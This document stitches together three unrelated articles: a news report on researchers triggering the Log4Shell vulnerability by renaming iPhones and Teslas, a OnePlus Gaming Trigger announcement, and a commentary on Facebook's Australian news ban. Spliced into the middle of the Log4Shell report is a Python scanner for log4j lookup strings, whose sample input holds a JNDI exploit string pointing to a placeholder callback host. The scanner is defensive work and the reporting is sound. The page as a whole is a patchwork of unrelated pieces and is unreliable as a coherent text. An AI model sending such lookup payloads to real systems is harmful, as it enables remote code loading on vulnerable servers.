Researchers trigger new exploit by renaming an iPhone and a Tesla

Security researchers investigating the recently discovered and “extremely bad” Log4Shell exploit claim to have used it on devices as varied as iPhones and Tesla cars. Per screenshots shared online, changing the device name of an iPhone or Tesla to a special exploit string was enough to trigger a ping from Apple or Tesla servers, indicating that the server at the other end was vulnerable to Log4Shell.

In the demonstrations, researchers switched the device names to be a string of characters that would send servers to a testing URL, exploiting the behavior enabled by the vulnerability. After the name was changed, incoming traffic showed URL requests from IP addresses belonging to Apple and, in the case of Tesla, China Unicom — the company’s mobile service partner for the Chinese market. In short, the researchers tricked Apple and Tesla servers into visiting a URL of their choice.

An iPhone device information screen with its name changed to contain the exploit string.
Image: Cas van Cooten / Twitter

The iPhone demonstration came from a Dutch security researcher; the other was uploaded to the anonymous Log4jAttackSurface GitHub repository.

Assuming the images are genuine, they show behavior — remote resource loading — that should not be possible with text contained in a device name. This proof of concept has led to widespread reporting that Apple and Tesla are vulnerable to the exploit.

While the demonstration is alarming, it’s not clear how useful it would be for cybercriminals. In theory, an attacker could host malicious code at the target URL in order to infect vulnerable servers, but a well-maintained network could prevent such an attack at the network level. More broadly, there’s no indication that the method could lead to any broader compromise of Apple or Tesla’s systems. (Neither company responded to an email request for comment by the time of publication.)

Still, it’s a reminder of the complex nature of technological systems, which almost always depend on code pulled in from third-party libraries. The Log4Shell exploit affects an open-source Java tool called log4j, which is widely used for application event logging. It’s still not known exactly how many devices are affected, but researchers estimate that the number is in the millions, including obscure systems that are rarely targeted by attacks of this nature.

The full extent of exploitation in the wild is unknown, but in a blog post, digital forensics platform Cado reported detecting servers trying to use this method to install Mirai botnet code.

Log4Shell is all the more serious for being relatively easy to exploit. The vulnerability works by tricking the application into interpreting a piece of text as a link to a remote resource, and trying to retrieve that resource instead of saving the text as it is written. All that’s necessary is for a vulnerable device to save the special string of characters in its application logs.

This creates the potential for vulnerability in many systems that accept user input, since message text can be stored in the logs. The log4j vulnerability was first spotted in Minecraft servers, which attackers could compromise using chat messages, and systems that send and receive other message formats, like SMS, are clearly also susceptible.

At least one major SMS provider appears to be vulnerable to the exploit, according to testing conducted by The Verge. When sent to numbers operated by the SMS provider, text messages containing exploit code triggered a response from the company’s servers that revealed information about the IP address and host name, suggesting that the servers could be tricked into executing malicious code. Calls and emails to the affected company had not been answered at the time of publication.
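The mechanism described above is that untrusted text (a device name, a chat message, an SMS body) reaches a log4j logger, which interprets a `${...}` lookup inside it instead of storing it verbatim. The following is an added example, not code from the original article: a small Python scanner a defender can run over the fields an application is about to log, flagging any lookup syntax and treating a JNDI lookup as high severity, plus a sanitiser that breaks the `${` syntax so a still-unpatched log4j stores the text as plain characters. The sample inputs and the `callback.example.invalid` host are constructed for the example; sanitising input is defence in depth, not a substitute for upgrading the library.

```python
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Finding:
    field: str      # which untrusted field the token was found in
    token: str      # the ${...} lookup exactly as it appeared
    severity: str   # "high" for a JNDI lookup, "medium" for any other lookup


def extract_lookups(text: str) -> List[str]:
    """Return each outermost ${...} lookup in text, honouring nested braces.

    An unterminated "${" never closes, so it is not returned; neutralise()
    still breaks it.
    """
    tokens, depth, start, i = [], 0, -1, 0
    while i < len(text):
        if text.startswith("${", i):
            if depth == 0:
                start = i
            depth += 1
            i += 2
            continue
        if text[i] == "}" and depth > 0:
            depth -= 1
            if depth == 0:
                tokens.append(text[start:i + 1])
        i += 1
    return tokens


def scan(inputs: Dict[str, str]) -> List[Finding]:
    """Classify every lookup found across a set of untrusted fields."""
    findings = []
    for field, text in inputs.items():
        for tok in extract_lookups(text):
            severity = "high" if "jndi" in tok.lower() else "medium"
            findings.append(Finding(field, tok, severity))
    return findings


def neutralise(text: str) -> str:
    """Rewrite "${" so log4j no longer sees lookup syntax in the string."""
    return text.replace("${", "$_{")


# Constructed sample of the three kinds of untrusted field the article mentions.
SAMPLE_INPUTS = {
    "device_name": "Cas's iPhone ${jndi:ldap://callback.example.invalid/a}",
    "chat_message": "gg, set ${HOME} before you launch",
    "sms_body": "your code is 482913",
}
```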

An update to the log4j library has been released to mitigate the vulnerability, but patching all vulnerable machines will take time given the challenges of updating enterprise software at scale.



OnePlus Gaming Trigger may confuse your senses

Today we witnessed the first reveal of the OnePlus 9, OnePlus 9 Pro, and the OnePlus Watch, AND a new accessory. The accessory was called OnePlus Gaming Trigger, and it was made for the whole OnePlus 9 family of devices. It’s a sort of clip and a button, made to allow the user to turn their digital experience into a slightly more… tactile experience.

“For gamers, we’re also introducing a brand new OnePlus Gaming Trigger with capacitive sensing technology,” said OnePlus Head of Corporate Communications Ryan Fenwick. “Simply snap on one or both of the triggers to upgrade your mobile gaming experience.”

They clip onto any one of the several OnePlus 9 models revealed today. It would appear that they’ll require that you’re either using no protective case or one of the OnePlus cases that are relatively thin – they clip right onto the edge of the phone.

“They’re not just beautiful to look at, they also provide a more tactile gaming experience,” said OnePlus Head of Campaigns, Tilen Pigac. “Just clip them on those beautiful corners and you have two extra buttons for that physical trigger experience.”

It’s not yet clear if they’ll work with any game (with buttons in the upper right and left of the screen) or if they’ll require some sort of developer input to function. In any case, it does not seem that they’ll require any sort of power source. These are all about mechanical input – back to basics!

Neither release date nor price was revealed for the OnePlus Gaming Trigger (or Triggers). Stay tuned as we learn more about these oddities for the OnePlus 9 collection. And tap the timeline below to learn more about the OnePlus 9, 9 Pro, and OnePlus Watch.


Facebook pulled the trigger on Australian news — and shot itself in the foot

Facebook today made good on its threat to block Australians from accessing or posting news content. The ban includes blocking links to Australian and overseas news publishers.

Facebook said the ban was a direct response to the federal government’s news media code legislation, which is expected to become law soon and would require digital platforms such as Facebook and Google to pay news media companies whose content they host.

Why has Facebook done this?

The move is either a last-ditch attempt to gain concessions in the legislation or a simple cut-and-run by Facebook.

The social media giant claims news publishers derive more value from news sharing than Facebook does. This is plausible, as news content makes up only 4% of sharing on the platform, whereas many news sites gain a large fraction of their traffic from Facebook referrals.

But this is probably more about flexing some muscle. Facebook may be demonstrating to the Federal government that if it doesn’t like the rules, it can damage national interests.


Collateral damage

Australians will feel some short-term negative impacts of Facebook’s flex.

Certain government Facebook pages, such as those belonging to the Bureau of Meteorology and some health department sites, have been caught up in the ban. Facebook says this is due to the wording of the legislation, stating:

As the law does not provide clear guidance on the definition of news content, we have taken a broad definition in order to respect the law as drafted.

While Facebook says it will restore non-news pages, the action will put pressure on the government to define more clearly what it means by news content.

In the meantime, the move will affect Australians’ access to vital information related to emergencies and the COVID-19 pandemic. Without a concerted effort to ensure online behavior change from users, this could be dangerous.

Misinformation risk

We can also expect to see a short-term proliferation of misinformation as Facebook’s news feed will have a vacuum of professionally sourced and fact-checked news.

A significant number of Australians discuss news on Facebook, both via their newsfeed and in groups. Being able to source factual information from news sites is part of the everyday political and social participation that social media platforms facilitate.

The democratic impact of Facebook’s ban will be felt – and is counter to Facebook’s stated principle of connecting people and its recent pledge to tackle misinformation.

Will it hurt Facebook?

The impact of this action against the legislation on Facebook itself is yet to be seen.

The reputational damage from blocking important sites that serve Australia’s public interest overnight – and yet taking years to get on top of user privacy breaches and misinformation – undermines the legitimacy of the platform and its claimed civic intentions.

Facebook’s actions may send a message to the government, but they will also send one to their Australian users.

Readers are likely to find other ways to get their news. If we learn from the experience of Google’s news ban in Spain, we can see that after an initial dip in traffic, most major news organizations in Spain regained much of their web traffic after about a year.

Surfing social waves

Tools such as Facebook are only useful if people want to use them. And for some existing users, the lack of news might be a dealbreaker.

Facebook already faces a long-term problem of an aging user demographic, as under-25s turn to Instagram, Snapchat, and TikTok for news and information.

Young people may have Facebook profiles, but they are less likely to be active users.

News organizations are already following their lead. For example, The Conversation Australia has 325,735 Facebook followers and will probably feel the impact of the loss of engagement there.

But it also has more than 21,000 Instagram followers and counting. It is increasingly making visual news “tiles” to cater to the younger demographic of users who source news from other platforms. It has also been working to reach readers directly via regular email newsletters, which one in five US readers now say is their primary way of accessing news.

News organizations have already learned how to pivot fast. When Facebook changed its algorithms in 2018 to deprioritize news publishers, many took action to reduce their reliance on Facebook’s traffic, analytics, or digital advertising dollars.

What now?

Larger news organizations will be OK in the long run. But Australia’s smaller outlets, including local publishers and non-profits that produce public-interest journalism, will need protection.

The long-term task for news organizations and journalists is to convince the public – especially young people – that it’s worthwhile to actively seek out professional news and journalism as part of their daily online lives, rather than simply reading whatever comes across their feed.

As for Facebook, going back to its original purpose of facilitating personal connection and social networking, rather than posing as a forum for public information, may not be a bad thing. But the reputational damage and publisher exodus will eventually damage its core business: digital advertising revenue.

This article by Diana Bossio, Lecturer, Media and Communications, Swinburne University of Technology is republished from The Conversation under a Creative Commons license. Read the original article.
